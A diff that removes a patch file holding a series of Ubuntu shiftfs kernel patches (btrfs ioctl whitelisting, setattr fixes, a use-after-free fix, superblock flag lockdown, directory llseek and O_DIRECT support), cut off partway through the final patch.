-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1823186
-
-Shiftfs currently only passes through a few ioctl()s to the underlay. These
-are ioctl()s that are generally considered safe. Doing it for random
-ioctl()s would be a security issue. Permissions for ioctl()s are not
-checked before the filesystem gets involved so if we were to override
-credentials we e.g. could do a btrfs tree search in the underlay which we
-normally wouldn't be allowed to do.
-However, the btrfs filesystem allows unprivileged users to perform various
-operations through its ioctl() interface. With shiftfs these ioctl() are
-currently not working. To not regress users that expect btrfs ioctl()s to
-work in unprivileged containers we can create a whitelist of ioctl()s that
-we allow to go through to the underlay and for which we also switch
-credentials.
-The main problem is how we switch credentials. Since permissions checks for
-ioctl()s are
-done by the actual file system and not by the vfs this would mean that any
-additional capable(<cap>)-based checks done by the filesystem would
-unconditonally pass after we switch credentials. So to make credential
-switching safe we drop *all* capabilities when switching credentials. This
-means that only inode-based permission checks will pass.
-
-Btrfs also allows unprivileged users to delete snapshots when the
-filesystem is mounted with user_subvol_rm_allowed mount option or if the
-the callers is capable(CAP_SYS_ADMIN). The latter should never be the case
-with unprivileged users. To make sure we only allow removal of snapshots in
-the former case we drop all capabilities (see above) when switching
-credentials.
-
-Additonally, btrfs allows the creation of snapshots. To make this work we
-need to be (too) clever. When doing snapshots btrfs requires that an fd to
-the directory the snapshot is supposed to be created in be passed along.
-This fd obviously references a shiftfs file and as such a shiftfs dentry
-and inode.  This will cause btrfs to yell EXDEV. To circumnavigate this
-problem we need to silently temporarily replace the passed in fd with an fd
-that refers to a file that references a btrfs dentry and inode.
-
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Tyler Hicks <tyhicks@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 156 +++++++++++++++++++++++++++++++++++++++++++++++++--
- 1 file changed, 151 insertions(+), 5 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index ad1ae5bce6c1..678cad30f4a5 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1,6 +1,8 @@
-+#include <linux/btrfs.h>
- #include <linux/capability.h>
- #include <linux/cred.h>
- #include <linux/mount.h>
-+#include <linux/fdtable.h>
- #include <linux/file.h>
- #include <linux/fs.h>
- #include <linux/namei.h>
-@@ -41,7 +43,21 @@ static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
- 
- #define SHIFTFS_PASSTHROUGH_NONE 0
- #define SHIFTFS_PASSTHROUGH_STAT 1
--#define SHIFTFS_PASSTHROUGH_ALL (SHIFTFS_PASSTHROUGH_STAT)
-+#define SHIFTFS_PASSTHROUGH_IOCTL 2
-+#define SHIFTFS_PASSTHROUGH_ALL                                                \
-+	(SHIFTFS_PASSTHROUGH_STAT | SHIFTFS_PASSTHROUGH_IOCTL)
-+
-+static inline bool shiftfs_passthrough_ioctls(struct shiftfs_super_info *info)
-+{
-+	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
-+		return false;
-+
-+	if (info->info_mark &&
-+	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
-+		return false;
-+
-+	return true;
-+}
- 
- static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info)
- {
-@@ -1345,18 +1361,120 @@ static inline void shiftfs_revert_ioctl_creds(const struct cred *oldcred,
- 	return shiftfs_revert_object_creds(oldcred, newcred);
- }
- 
-+static inline bool is_btrfs_snap_ioctl(int cmd)
-+{
-+	if ((cmd == BTRFS_IOC_SNAP_CREATE) || (cmd == BTRFS_IOC_SNAP_CREATE_V2))
-+		return true;
-+
-+	return false;
-+}
-+
-+static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
-+					  void __user *arg,
-+					  struct btrfs_ioctl_vol_args *v1,
-+					  struct btrfs_ioctl_vol_args_v2 *v2)
-+{
-+	int ret;
-+
-+	if (!is_btrfs_snap_ioctl(cmd))
-+		return 0;
-+
-+	if (cmd == BTRFS_IOC_SNAP_CREATE)
-+		ret = copy_to_user(arg, v1, sizeof(*v1));
-+	else
-+		ret = copy_to_user(arg, v2, sizeof(*v2));
-+
-+	fdput(lfd);
-+	__close_fd(current->files, fd);
-+	kfree(v1);
-+	kfree(v2);
-+
-+	return ret;
-+}
-+
-+static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
-+					  struct btrfs_ioctl_vol_args **b1,
-+					  struct btrfs_ioctl_vol_args_v2 **b2,
-+					  struct fd *lfd,
-+					  int *newfd)
-+{
-+	int oldfd, ret;
-+	struct fd src;
-+	struct btrfs_ioctl_vol_args *v1 = NULL;
-+	struct btrfs_ioctl_vol_args_v2 *v2 = NULL;
-+
-+	if (!is_btrfs_snap_ioctl(cmd))
-+		return 0;
-+
-+	if (cmd == BTRFS_IOC_SNAP_CREATE) {
-+		v1 = memdup_user(arg, sizeof(*v1));
-+		if (IS_ERR(v1))
-+			return PTR_ERR(v1);
-+		oldfd = v1->fd;
-+		*b1 = v1;
-+	} else {
-+		v2 = memdup_user(arg, sizeof(*v2));
-+		if (IS_ERR(v2))
-+			return PTR_ERR(v2);
-+		oldfd = v2->fd;
-+		*b2 = v2;
-+	}
-+
-+	src = fdget(oldfd);
-+	if (!src.file)
-+		return -EINVAL;
-+
-+	ret = shiftfs_real_fdget(src.file, lfd);
-+	fdput(src);
-+	if (ret)
-+		return ret;
-+
-+	*newfd = get_unused_fd_flags(lfd->file->f_flags);
-+	if (*newfd < 0) {
-+		fdput(*lfd);
-+		return *newfd;
-+	}
-+
-+	fd_install(*newfd, lfd->file);
-+
-+	if (cmd == BTRFS_IOC_SNAP_CREATE) {
-+		v1->fd = *newfd;
-+		ret = copy_to_user(arg, v1, sizeof(*v1));
-+		v1->fd = oldfd;
-+	} else {
-+		v2->fd = *newfd;
-+		ret = copy_to_user(arg, v2, sizeof(*v2));
-+		v2->fd = oldfd;
-+	}
-+
-+	if (ret)
-+		shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
-+
-+	return ret;
-+}
-+
- static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
- 			       unsigned long arg)
- {
--	long ret = 0;
- 	struct fd lowerfd;
- 	struct cred *newcred;
- 	const struct cred *oldcred;
-+	int newfd = -EBADF;
-+	long err = 0, ret = 0;
-+	void __user *argp = (void __user *)arg;
-+	struct fd btrfs_lfd = {};
- 	struct super_block *sb = file->f_path.dentry->d_sb;
-+	struct btrfs_ioctl_vol_args *btrfs_v1 = NULL;
-+	struct btrfs_ioctl_vol_args_v2 *btrfs_v2 = NULL;
-+
-+	ret = shiftfs_btrfs_ioctl_fd_replace(cmd, argp, &btrfs_v1, &btrfs_v2,
-+					     &btrfs_lfd, &newfd);
-+	if (ret < 0)
-+		return ret;
- 
- 	ret = shiftfs_real_fdget(file, &lowerfd);
- 	if (ret)
--		return ret;
-+		goto out_restore;
- 
- 	ret = shiftfs_override_ioctl_creds(sb, &oldcred, &newcred);
- 	if (ret)
-@@ -1372,9 +1490,33 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
- out_fdput:
- 	fdput(lowerfd);
- 
-+out_restore:
-+	err = shiftfs_btrfs_ioctl_fd_restore(cmd, btrfs_lfd, newfd, argp,
-+					     btrfs_v1, btrfs_v2);
-+	if (!ret)
-+		ret = err;
-+
- 	return ret;
- }
- 
-+static bool in_ioctl_whitelist(int flag)
-+{
-+	switch (flag) {
-+	case BTRFS_IOC_SNAP_CREATE:
-+		return true;
-+	case BTRFS_IOC_SNAP_CREATE_V2:
-+		return true;
-+	case BTRFS_IOC_SUBVOL_CREATE:
-+		return true;
-+	case BTRFS_IOC_SUBVOL_CREATE_V2:
-+		return true;
-+	case BTRFS_IOC_SNAP_DESTROY:
-+		return true;
-+	}
-+
-+	return false;
-+}
-+
- static long shiftfs_ioctl(struct file *file, unsigned int cmd,
- 			  unsigned long arg)
- {
-@@ -1386,7 +1528,9 @@ static long shiftfs_ioctl(struct file *file, unsigned int cmd,
- 	case FS_IOC_SETFLAGS:
- 		break;
- 	default:
--		return -ENOTTY;
-+		if (!in_ioctl_whitelist(cmd) ||
-+		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
-+			return -ENOTTY;
- 	}
- 
- 	return shiftfs_real_ioctl(file, cmd, arg);
-@@ -1403,7 +1547,9 @@ static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd,
- 	case FS_IOC32_SETFLAGS:
- 		break;
- 	default:
--		return -ENOIOCTLCMD;
-+		if (!in_ioctl_whitelist(cmd) ||
-+		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
-+			return -ENOIOCTLCMD;
- 	}
- 
- 	return shiftfs_real_ioctl(file, cmd, arg);
--- 
-2.39.2
-
-From 7e64c9484f2524943cde1164852c1888312c010f Mon Sep 17 00:00:00 2001
-From: Seth Forshee <seth.forshee@canonical.com>
-Date: Thu, 11 Apr 2019 07:31:04 -0500
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: use translated ids when chaning lower
- fs attrs
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1824350
-
-shiftfs_setattr() is preparing a new set of attributes with the
-owner translated for the lower fs, but it then passes the
-original attrs. As a result the owner is set to the untranslated
-owner, which causes the shiftfs inodes to also have incorrect
-ids. For example:
-
- # mkdir dir
- # touch file
- # ls -lh dir file
- drwxr-xr-x 2 root root 4.0K Apr 11 13:05 dir
- -rw-r--r-- 1 root root 0 Apr 11 13:05 file
- # chown 500:500 dir file
- # ls -lh dir file
- drwxr-xr-x 2 1000500 1000500 4.0K Apr 11 12:42 dir
- -rw-r--r-- 1 1000500 1000500 0 Apr 11 12:42 file
-
-Fix this to pass the correct iattr struct to notify_change().
-
-Reviewed-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com>
-Acked-by: Tyler Hicks <tyhicks@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 678cad30f4a5..e736fd6afcb4 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -779,7 +779,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- 
- 	inode_lock(loweri);
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
--	err = notify_change(lowerd, attr, NULL);
-+	err = notify_change(lowerd, &newattr, NULL);
- 	revert_creds(oldcred);
- 	inode_unlock(loweri);
- 
--- 
-2.39.2
-
-From 84e09374dce45b2aaec7e719acd209b1e5e4ae85 Mon Sep 17 00:00:00 2001
-From: Seth Forshee <seth.forshee@canonical.com>
-Date: Sat, 13 Apr 2019 14:41:01 -0500
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix passing of attrs to underaly for
- setattr
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1824717
-
-shiftfs_setattr() makes a copy of the attrs it was passed to pass
-to the lower fs. It then calls setattr_prepare() with the original
-attrs, and this may make changes which are not reflected in the
-attrs passed to the lower fs. To fix this, copy the attrs to the
-new struct for the lower fs after calling setattr_prepare().
-
-Additionally, notify_change() may have set ATTR_MODE when one of
-ATTR_KILL_S[UG]ID is set, and passing this combination to
-notify_change() will trigger a BUG(). Do as overlayfs and
-ecryptfs both do, and clear ATTR_MODE if either of those bits
-is set.
-
-Reviewed-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Marcelo Henrique Cerri <marcelo.cerri@canonical.com>
-Acked-by: Brad Figg <brad.figg@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 10 +++++++++-
- 1 file changed, 9 insertions(+), 1 deletion(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index e736fd6afcb4..8e064756ea0c 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -765,7 +765,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- {
- 	struct dentry *lowerd = dentry->d_fsdata;
- 	struct inode *loweri = lowerd->d_inode;
--	struct iattr newattr = *attr;
-+	struct iattr newattr;
- 	const struct cred *oldcred;
- 	struct super_block *sb = dentry->d_sb;
- 	int err;
-@@ -774,9 +774,17 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- 	if (err)
- 		return err;
- 
-+	newattr = *attr;
- 	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
- 	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
- 
-+	/*
-+	 * mode change is for clearing setuid/setgid bits. Allow lower fs
-+	 * to interpret this in its own way.
-+	 */
-+	if (newattr.ia_valid & (ATTR_KILL_SUID|ATTR_KILL_SGID))
-+		newattr.ia_valid &= ~ATTR_MODE;
-+
- 	inode_lock(loweri);
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
- 	err = notify_change(lowerd, &newattr, NULL);
--- 
-2.39.2
-
-From a3ba10b3019139566fa65c351966ca3482c90819 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian@brauner.io>
-Date: Mon, 15 Apr 2019 15:21:55 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent use-after-free when verifying
- mount options
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1824735
-
-Copy up the passthrough mount settings of the mark mount point to the
-shiftfs overlay.
-
-Before this commit we used to keep a reference to the shiftfs mark
-mount's shiftfs_super_info which was stashed in the superblock of the
-mark mount. The problem is that we only take a reference to the mount of
-the underlay, i.e. the filesystem that is *under* the shiftfs mark
-mount. This means when someone performs a shiftfs mark mount, then a
-shiftfs overlay mount and then immediately unmounts the shiftfs mark
-mount we muck with invalid memory since shiftfs_put_super might have
-already been called freeing that memory.
-
-Another solution would be to start reference counting. But this would be
-overkill. We only care about the passthrough mount option of the mark
-mount. And we only need it to verify that on remount the new passthrough
-options of the shiftfs overlay are a subset of the mark mount's
-passthrough options. In other scenarios we don't care. So copying up is
-good enough and also only needs to happen once on mount, i.e. when a new
-superblock is created and the .fill_super method is called.
-
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Seth Forshee <seth.forshee@canonical.com>
-Acked-by: Stefan Bader <stefan.bader@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 29 ++++++++++++++++++-----------
- 1 file changed, 18 insertions(+), 11 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 8e064756ea0c..4c8a6ec2a617 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -28,7 +28,7 @@ struct shiftfs_super_info {
- 	const struct cred *creator_cred;
- 	bool mark;
- 	unsigned int passthrough;
--	struct shiftfs_super_info *info_mark;
-+	unsigned int passthrough_mark;
- };
- 
- struct shiftfs_file_info {
-@@ -52,10 +52,6 @@ static inline bool shiftfs_passthrough_ioctls(struct shiftfs_super_info *info)
- 	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
- 		return false;
- 
--	if (info->info_mark &&
--	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
--		return false;
--
- 	return true;
- }
- 
-@@ -64,10 +60,6 @@ static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info)
- 	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_STAT))
- 		return false;
- 
--	if (info->info_mark &&
--	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_STAT))
--		return false;
--
- 	return true;
- }
- 
-@@ -1824,7 +1816,7 @@ static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
- 
- 	if (info->passthrough != new.passthrough) {
- 		/* Don't allow exceeding passthrough options of mark mount. */
--		if (!passthrough_is_subset(info->info_mark->passthrough,
-+		if (!passthrough_is_subset(info->passthrough_mark,
- 					   info->passthrough))
- 			return -EPERM;
- 
-@@ -1926,9 +1918,19 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 
- 			sbinfo->mnt = mntget(sbinfo_mp->mnt);
- 			dentry = dget(path.dentry->d_fsdata);
-+			/*
-+			 * Copy up the passthrough mount options from the
-+			 * parent mark mountpoint.
-+			 */
-+			sbinfo->passthrough_mark = sbinfo_mp->passthrough_mark;
- 		} else {
- 			sbinfo->mnt = mntget(path.mnt);
- 			dentry = dget(path.dentry);
-+			/*
-+			 * For a new mark passthrough_mark and passthrough
-+			 * are identical.
-+			 */
-+			sbinfo->passthrough_mark = sbinfo->passthrough;
- 		}
- 
- 		sbinfo->creator_cred = prepare_creds();
-@@ -1956,7 +1958,12 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 		sbinfo->mnt = mntget(sbinfo_mp->mnt);
- 		sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred);
- 		dentry = dget(path.dentry->d_fsdata);
--		sbinfo->info_mark = sbinfo_mp;
-+		/*
-+		 * Copy up passthrough settings from mark mountpoint so we can
-+		 * verify when the overlay wants to remount with different
-+		 * passthrough settings.
-+		 */
-+		sbinfo->passthrough_mark = sbinfo_mp->passthrough;
- 	}
- 
- 	sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1;
--- 
-2.39.2
-
-From a6ec1bf679d71f552f3eee7bf2b5458a6ea71e9a Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian@brauner.io>
-Date: Tue, 16 Apr 2019 18:29:00 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: use separate llseek method for
- directories
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1824812
-
-Give shiftfs it's own proper llseek method for directories.
-
-Before this commit we used to rely on an llseek method that was
-targeted for regular files for both directories and regular files.
-However, the realfile's f_pos was not correctly handled when userspace
-called lseek(2) on a shiftfs directory file. Give directories their
-own llseek operation so that seeking on a directory file is properly
-supported.
-
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Seth Forshee <seth.forshee@canonical.com>
-Acked-by: Tyler Hicks <tyhicks@canonical.com>
-Acked-by: Stefan Bader <stefan.bader@canonical.com>
-Signed-off-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 14 +++++++++++---
- 1 file changed, 11 insertions(+), 3 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 4c8a6ec2a617..9771165d1ce0 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1144,7 +1144,15 @@ static int shiftfs_release(struct inode *inode, struct file *file)
- 	return 0;
- }
- 
--static loff_t shiftfs_llseek(struct file *file, loff_t offset, int whence)
-+static loff_t shiftfs_dir_llseek(struct file *file, loff_t offset, int whence)
-+{
-+	struct shiftfs_file_info *file_info = file->private_data;
-+	struct file *realfile = file_info->realfile;
-+
-+	return vfs_llseek(realfile, offset, whence);
-+}
-+
-+static loff_t shiftfs_file_llseek(struct file *file, loff_t offset, int whence)
- {
- 	struct inode *realinode = file_inode(file)->i_private;
- 
-@@ -1653,7 +1661,7 @@ static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx)
- const struct file_operations shiftfs_file_operations = {
- 	.open			= shiftfs_open,
- 	.release		= shiftfs_release,
--	.llseek			= shiftfs_llseek,
-+	.llseek			= shiftfs_file_llseek,
- 	.read_iter		= shiftfs_read_iter,
- 	.write_iter		= shiftfs_write_iter,
- 	.fsync			= shiftfs_fsync,
-@@ -1670,7 +1678,7 @@ const struct file_operations shiftfs_dir_operations = {
- 	.compat_ioctl		= shiftfs_compat_ioctl,
- 	.fsync			= shiftfs_fsync,
- 	.iterate_shared		= shiftfs_iterate_shared,
--	.llseek			= shiftfs_llseek,
-+	.llseek			= shiftfs_dir_llseek,
- 	.open			= shiftfs_open,
- 	.read			= generic_read_dir,
- 	.release		= shiftfs_release,
--- 
-2.39.2
-
-From 10c6312a5c1cd2fbbbcb47adf7597e8cb2e18391 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian@brauner.io>
-Date: Wed, 8 May 2019 14:13:14 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: lock down certain superblock flags
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1827122
-
-This locks down various superblock flags to prevent userns-root from
-remounting a superblock with less restrictive options than the original
-mark or underlay mount.
-
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 47 ++++++++++++++++++++++++++++++++++++++++++++++-
- 1 file changed, 46 insertions(+), 1 deletion(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 9771165d1ce0..a1dae7ea593b 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1808,6 +1808,33 @@ static inline bool passthrough_is_subset(int old_flags, int new_flags)
- 	return true;
- }
- 
-+static int shiftfs_super_check_flags(unsigned long old_flags,
-+				     unsigned long new_flags)
-+{
-+	if ((old_flags & SB_RDONLY) && !(new_flags & SB_RDONLY))
-+		return -EPERM;
-+
-+	if ((old_flags & SB_NOSUID) && !(new_flags & SB_NOSUID))
-+		return -EPERM;
-+
-+	if ((old_flags & SB_NODEV) && !(new_flags & SB_NODEV))
-+		return -EPERM;
-+
-+	if ((old_flags & SB_NOEXEC) && !(new_flags & SB_NOEXEC))
-+		return -EPERM;
-+
-+	if ((old_flags & SB_NOATIME) && !(new_flags & SB_NOATIME))
-+		return -EPERM;
-+
-+	if ((old_flags & SB_NODIRATIME) && !(new_flags & SB_NODIRATIME))
-+		return -EPERM;
-+
-+	if (!(old_flags & SB_POSIXACL) && (new_flags & SB_POSIXACL))
-+		return -EPERM;
-+
-+	return 0;
-+}
-+
- static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
- {
- 	int err;
-@@ -1818,6 +1845,10 @@ static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
- 	if (err)
- 		return err;
- 
-+	err = shiftfs_super_check_flags(sb->s_flags, *flags);
-+	if (err)
-+		return err;
-+
- 	/* Mark mount option cannot be changed. */
- 	if (info->mark || (info->mark != new.mark))
- 		return -EPERM;
-@@ -1847,6 +1878,16 @@ struct shiftfs_data {
- 	const char *path;
- };
- 
-+static void shiftfs_super_force_flags(struct super_block *sb,
-+				      unsigned long lower_flags)
-+{
-+	sb->s_flags |= lower_flags & (SB_RDONLY | SB_NOSUID | SB_NODEV |
-+				      SB_NOEXEC | SB_NOATIME | SB_NODIRATIME);
-+
-+	if (!(lower_flags & SB_POSIXACL))
-+		sb->s_flags &= ~SB_POSIXACL;
-+}
-+
- static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 			      int silent)
- {
-@@ -1888,6 +1929,8 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 		goto out_put_path;
- 	}
- 
-+	sb->s_flags |= SB_POSIXACL;
-+
- 	if (sbinfo->mark) {
- 		struct super_block *lower_sb = path.mnt->mnt_sb;
- 
-@@ -1904,6 +1947,8 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 		 */
- 		sb->s_iflags = SB_I_NOEXEC;
- 
-+		shiftfs_super_force_flags(sb, lower_sb->s_flags);
-+
- 		/*
- 		 * Handle nesting of shiftfs mounts by referring this mark
- 		 * mount back to the original mark mount. This is more
-@@ -1972,6 +2017,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 		 * passthrough settings.
- 		 */
- 		sbinfo->passthrough_mark = sbinfo_mp->passthrough;
-+		shiftfs_super_force_flags(sb, path.mnt->mnt_sb->s_flags);
- 	}
- 
- 	sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1;
-@@ -1995,7 +2041,6 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 	sb->s_op = &shiftfs_super_ops;
- 	sb->s_xattr = shiftfs_xattr_handlers;
- 	sb->s_d_op = &shiftfs_dentry_ops;
--	sb->s_flags |= SB_POSIXACL;
- 	sb->s_root = d_make_root(inode);
- 	if (!sb->s_root) {
- 		err = -ENOMEM;
--- 
-2.39.2
-
-From 650ec55632c03c03e6cc5b08a764609b4b0eb192 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian@brauner.io>
-Date: Tue, 11 Jun 2019 11:47:35 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: allow changing ro/rw for subvolumes
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1832316
-
-This enables toggling between ro/rw for btrfs subvolumes under shiftfs.
-
-Currently, btrfs workloads employing shiftfs cause regression.
-With btrfs unprivileged users can already toggle whether a subvolume
-will be ro or rw. This is broken on current shiftfs as we haven't
-whitelisted these ioctls().
-To prevent such regression, we need to whitelist the ioctls
-BTRFS_IOC_FS_INFO, BTRFS_IOC_SUBVOL_GETFLAGS, and
-BTRFS_IOC_SUBVOL_SETFLAGS. All of them should be safe for unprivileged
-users.
-
-Cc: Seth Forshee <seth.forshee@canonical.com>
-Cc: Tyler Hicks <tyhicks@canonical.com>
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 21 ++++++++++++++++++---
- 1 file changed, 18 insertions(+), 3 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index a1dae7ea593b..49f6714e9f95 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1507,9 +1507,14 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
- 	return ret;
- }
- 
--static bool in_ioctl_whitelist(int flag)
-+static bool in_ioctl_whitelist(int flag, unsigned long arg)
- {
-+	void __user *argp = (void __user *)arg;
-+	u64 flags = 0;
-+
- 	switch (flag) {
-+	case BTRFS_IOC_FS_INFO:
-+		return true;
- 	case BTRFS_IOC_SNAP_CREATE:
- 		return true;
- 	case BTRFS_IOC_SNAP_CREATE_V2:
-@@ -1517,6 +1522,16 @@ static bool in_ioctl_whitelist(int flag)
- 	case BTRFS_IOC_SUBVOL_CREATE:
- 		return true;
- 	case BTRFS_IOC_SUBVOL_CREATE_V2:
-+		return true;
-+	case BTRFS_IOC_SUBVOL_GETFLAGS:
-+		return true;
-+	case BTRFS_IOC_SUBVOL_SETFLAGS:
-+		if (copy_from_user(&flags, arg, sizeof(flags)))
-+			return false;
-+
-+		if (flags & ~BTRFS_SUBVOL_RDONLY)
-+			return false;
-+
- 		return true;
- 	case BTRFS_IOC_SNAP_DESTROY:
- 		return true;
-@@ -1536,7 +1551,7 @@ static long shiftfs_ioctl(struct file *file, unsigned int cmd,
- 	case FS_IOC_SETFLAGS:
- 		break;
- 	default:
--		if (!in_ioctl_whitelist(cmd) ||
-+		if (!in_ioctl_whitelist(cmd, arg) ||
- 		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
- 			return -ENOTTY;
- 	}
-@@ -1555,7 +1570,7 @@ static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd,
- 	case FS_IOC32_SETFLAGS:
- 		break;
- 	default:
--		if (!in_ioctl_whitelist(cmd) ||
-+		if (!in_ioctl_whitelist(cmd, arg) ||
- 		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
- 			return -ENOIOCTLCMD;
- 	}
--- 
-2.39.2
-
-From cd66a65bbea66683404adadd7d61ec02d04ac21a Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian@brauner.io>
-Date: Fri, 19 Jul 2019 17:50:46 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: add O_DIRECT support
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1837223
-
-This enabled O_DIRECT support for shiftfs if the underlay supports it.
-
-Currently shiftfs does not handle O_DIRECT if the underlay supports it.
-This is blocking dqlite - an essential part of LXD - from profiting from
-the performance benefits of O_DIRECT on suitable filesystems when used
-with async io such as aio or io_uring.
-Overlayfs cannot support this directly since the upper filesystem in
-overlay can be any filesystem. So if the upper filesystem does not
-support O_DIRECT but the lower filesystem does you're out of luck.
-Shiftfs does not suffer from the same problem since there is not concept
-of an upper filesystem in the same way that overlayfs has it.
-Essentially, shiftfs is a transparent shim relaying everything to the
-underlay while overlayfs' upper layer is not (completely).
-
-Cc: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 49f6714e9f95..addaa6e21e57 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1126,6 +1126,9 @@ static int shiftfs_open(struct inode *inode, struct file *file)
- 	}
- 
